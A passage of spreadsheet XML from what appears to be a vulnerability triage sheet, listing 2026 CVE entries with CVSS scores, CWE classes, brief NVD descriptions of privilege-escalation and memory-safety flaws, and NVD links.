      <c r="L776" s="5" t="inlineStr"/>
      <c r="M776" s="5" t="inlineStr"/>
      <c r="N776" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O776" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P776" s="5" t="inlineStr"/>
      <c r="Q776" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R776" s="5" t="inlineStr">
        <is>
          <t>In AppendCommentLine of AnnotationProcessor.cpp, there is a possible supply chain risk due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55273</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B777" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55285</t>
        </is>
      </c>
      <c r="D777" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E777" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F777" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G777" s="5" t="inlineStr"/>
      <c r="H777" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I777" s="5" t="inlineStr"/>
      <c r="J777" s="5" t="inlineStr"/>
      <c r="K777" s="5" t="inlineStr"/>
      <c r="L777" s="5" t="inlineStr"/>
      <c r="M777" s="5" t="inlineStr"/>
      <c r="N777" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O777" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P777" s="5" t="inlineStr"/>
      <c r="Q777" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R777" s="5" t="inlineStr">
        <is>
          <t>In openLogicalChannel of multiple files, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55285</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B778" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55294</t>
        </is>
      </c>
      <c r="D778" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E778" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F778" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G778" s="5" t="inlineStr"/>
      <c r="H778" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I778" s="5" t="inlineStr"/>
      <c r="J778" s="5" t="inlineStr"/>
      <c r="K778" s="5" t="inlineStr"/>
      <c r="L778" s="5" t="inlineStr"/>
      <c r="M778" s="5" t="inlineStr"/>
      <c r="N778" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O778" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P778" s="5" t="inlineStr"/>
      <c r="Q778" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R778" s="5" t="inlineStr">
        <is>
          <t>In ihevcd_get_tu_data_size of ihevcd_utils.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55294</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B779" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56172</t>
        </is>
      </c>
      <c r="D779" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E779" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F779" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G779" s="5" t="inlineStr"/>
      <c r="H779" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I779" s="5" t="inlineStr"/>
      <c r="J779" s="5" t="inlineStr"/>
      <c r="K779" s="5" t="inlineStr"/>
      <c r="L779" s="5" t="inlineStr"/>
      <c r="M779" s="5" t="inlineStr"/>
      <c r="N779" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O779" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P779" s="5" t="inlineStr"/>
      <c r="Q779" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R779" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows VHD miniport driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56172</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B780" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56177</t>
        </is>
      </c>
      <c r="D780" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E780" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F780" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G780" s="5" t="inlineStr"/>
      <c r="H780" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I780" s="5" t="inlineStr"/>
      <c r="J780" s="5" t="inlineStr"/>
      <c r="K780" s="5" t="inlineStr"/>
      <c r="L780" s="5" t="inlineStr"/>
      <c r="M780" s="5" t="inlineStr"/>
      <c r="N780" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O780" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P780" s="5" t="inlineStr"/>
      <c r="Q780" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R780" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56177</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B781" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56198</t>
        </is>
      </c>
      <c r="D781" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E781" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F781" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G781" s="5" t="inlineStr"/>
      <c r="H781" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I781" s="5" t="inlineStr"/>
      <c r="J781" s="5" t="inlineStr"/>
      <c r="K781" s="5" t="inlineStr"/>
      <c r="L781" s="5" t="inlineStr"/>
      <c r="M781" s="5" t="inlineStr"/>
      <c r="N781" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O781" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P781" s="5" t="inlineStr"/>
      <c r="Q781" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R781" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Trace Data Helper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56198</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B782" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5729</t>
        </is>
      </c>
      <c r="D782" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E782" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F782" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G782" s="5" t="inlineStr"/>
      <c r="H782" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I782" s="5" t="inlineStr"/>
      <c r="J782" s="5" t="inlineStr"/>
      <c r="K782" s="5" t="inlineStr"/>
      <c r="L782" s="5" t="inlineStr"/>
      <c r="M782" s="5" t="inlineStr"/>
      <c r="N782" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O782" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P782" s="5" t="inlineStr"/>
      <c r="Q782" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R782"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S782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5729</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B783" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58599</t>
        </is>
      </c>
      <c r="D783" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E783" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F783" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G783" s="5" t="inlineStr"/>
      <c r="H783" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I783" s="5" t="inlineStr"/>
      <c r="J783" s="5" t="inlineStr"/>
      <c r="K783" s="5" t="inlineStr"/>
      <c r="L783" s="5" t="inlineStr"/>
      <c r="M783" s="5" t="inlineStr"/>
      <c r="N783" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O783" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P783" s="5" t="inlineStr"/>
      <c r="Q783" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R783" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58599</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B784" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58600</t>
        </is>
      </c>
      <c r="D784" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E784" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F784" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G784" s="5" t="inlineStr"/>
      <c r="H784" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I784" s="5" t="inlineStr"/>
      <c r="J784" s="5" t="inlineStr"/>
      <c r="K784" s="5" t="inlineStr"/>
      <c r="L784" s="5" t="inlineStr"/>
      <c r="M784" s="5" t="inlineStr"/>
      <c r="N784" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O784" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P784" s="5" t="inlineStr"/>
      <c r="Q784" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R784" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58600</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B785" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58611</t>
        </is>
      </c>
      <c r="D785" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E785" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F785" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G785" s="5" t="inlineStr"/>
      <c r="H785" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I785" s="5" t="inlineStr"/>
      <c r="J785" s="5" t="inlineStr"/>
      <c r="K785" s="5" t="inlineStr">
        <is>
          <t>microsoft:xbox_gaming_services</t>
        </is>
      </c>
      <c r="L785" s="5" t="inlineStr"/>
      <c r="M785" s="5" t="inlineStr"/>
      <c r="N785" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O785" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P785" s="5" t="inlineStr"/>
      <c r="Q785" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R785" s="5" t="inlineStr">
        <is>
          <t>Improper authorization in XBox Gaming Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58611</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B786" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58820</t>
        </is>
      </c>
      <c r="D786" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E786" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F786" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G786" s="5" t="inlineStr"/>
      <c r="H786" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I786" s="5" t="inlineStr"/>
      <c r="J786" s="5" t="inlineStr"/>
      <c r="K786" s="5" t="inlineStr"/>
      <c r="L786" s="5" t="inlineStr"/>
      <c r="M786" s="5" t="inlineStr"/>
      <c r="N786" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O786" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P786" s="5" t="inlineStr"/>
      <c r="Q786" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R786" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible memory safety issue due to integer overflow. This could lead to local escalation of privilege with no additional execution privileges required.</t>
        </is>
      </c>
      <c r="S786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58820</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B787" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58823</t>
        </is>
      </c>
      <c r="D787" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E787" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F787" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G787" s="5" t="inlineStr"/>
      <c r="H787" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I787" s="5" t="inlineStr"/>
      <c r="J787" s="5" t="inlineStr"/>
      <c r="K787" s="5" t="inlineStr"/>
      <c r="L787" s="5" t="inlineStr"/>
      <c r="M787" s="5" t="inlineStr"/>
      <c r="N787" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O787" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P787" s="5" t="inlineStr"/>
      <c r="Q787" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R787" s="5" t="inlineStr">
        <is>
          <t>In stpropnci_process_std of stpropnci_std.cc, there is a possible memory safety issue due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58823</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B788" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58839</t>
        </is>
      </c>
      <c r="D788" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E788" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F788" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G788" s="5" t="inlineStr"/>
      <c r="H788" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I788" s="5" t="inlineStr"/>
      <c r="J788" s="5" t="inlineStr"/>
      <c r="K788" s="5" t="inlineStr"/>
      <c r="L788" s="5" t="inlineStr"/>
      <c r="M788" s="5" t="inlineStr"/>
      <c r="N788" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O788" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P788" s="5" t="inlineStr"/>
      <c r="Q788" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R788" s="5" t="inlineStr">
        <is>
          <t>In forEachLine of MountRegistry.cpp, there is a possible out of bounds read due to a buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58839</t>
        </is>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B789" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58846</t>
        </is>
      </c>
      <c r="D789" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E789" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F789" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G789" s="5" t="inlineStr"/>
      <c r="H789" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I789" s="5" t="inlineStr"/>
      <c r="J789" s="5" t="inlineStr"/>
      <c r="K789" s="5" t="inlineStr"/>
      <c r="L789" s="5" t="inlineStr"/>
      <c r="M789" s="5" t="inlineStr"/>
      <c r="N789" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O789" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P789" s="5" t="inlineStr"/>
      <c r="Q789" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R789" s="5" t="inlineStr">
        <is>
          <t>In kvm_iommu_map_sg of iommu.c, there is a possible use after free due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58846</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B790" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58874</t>
        </is>
      </c>
      <c r="D790" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E790" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F790" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G790" s="5" t="inlineStr"/>
      <c r="H790" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I790" s="5" t="inlineStr"/>
      <c r="J790" s="5" t="inlineStr"/>
      <c r="K790" s="5" t="inlineStr"/>
      <c r="L790" s="5" t="inlineStr"/>
      <c r="M790" s="5" t="inlineStr"/>
      <c r="N790" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O790" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P790" s="5" t="inlineStr"/>
      <c r="Q790" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R790" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of SmsController.java, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58874</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B791" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58941</t>
        </is>
      </c>
      <c r="D791" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E791" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F791" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G791" s="5" t="inlineStr"/>
      <c r="H791" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I791" s="5" t="inlineStr"/>
      <c r="J791" s="5" t="inlineStr"/>
      <c r="K791" s="5" t="inlineStr"/>
      <c r="L791" s="5" t="inlineStr"/>
      <c r="M791" s="5" t="inlineStr"/>
      <c r="N791" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O791" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P791" s="5" t="inlineStr"/>
      <c r="Q791" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R791" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of iommu.c, there is a possible out of bounds read/write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58941</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B792" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62697</t>
        </is>
      </c>
      <c r="D792" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E792" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F792" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G792" s="5" t="inlineStr"/>
      <c r="H792" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I792" s="5" t="inlineStr"/>
      <c r="J792" s="5" t="inlineStr"/>
      <c r="K792" s="5" t="inlineStr"/>
      <c r="L792" s="5" t="inlineStr"/>
      <c r="M792" s="5" t="inlineStr"/>
      <c r="N792" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O792" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P792" s="5" t="inlineStr"/>
      <c r="Q792" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R792" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62697</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B793" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62804</t>
        </is>
      </c>
      <c r="D793" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E793" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F793" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G793" s="5" t="inlineStr"/>
      <c r="H793" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I793" s="5" t="inlineStr"/>
      <c r="J793" s="5" t="inlineStr"/>
      <c r="K793" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L793" s="5" t="inlineStr"/>
      <c r="M793" s="5" t="inlineStr"/>
      <c r="N793" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O793" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P793" s="5" t="inlineStr"/>
      <c r="Q793" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R793" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Microsoft Office Word allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62804</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B794" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62810</t>
        </is>
      </c>
      <c r="D794" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E794" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F794" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G794" s="5" t="inlineStr"/>
      <c r="H794" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I794" s="5" t="inlineStr"/>
      <c r="J794" s="5" t="inlineStr"/>
      <c r="K794" s="5" t="inlineStr"/>
      <c r="L794" s="5" t="inlineStr"/>
      <c r="M794" s="5" t="inlineStr"/>
      <c r="N794" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O794" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P794" s="5" t="inlineStr"/>
      <c r="Q794" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
